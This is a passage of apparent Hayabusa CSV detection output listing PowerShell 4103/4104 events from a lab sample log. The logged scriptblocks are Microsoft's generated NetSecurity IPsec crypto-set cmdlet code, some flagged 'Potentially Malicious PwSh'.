$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', 
${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.614 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() 
Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] 
$script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { 
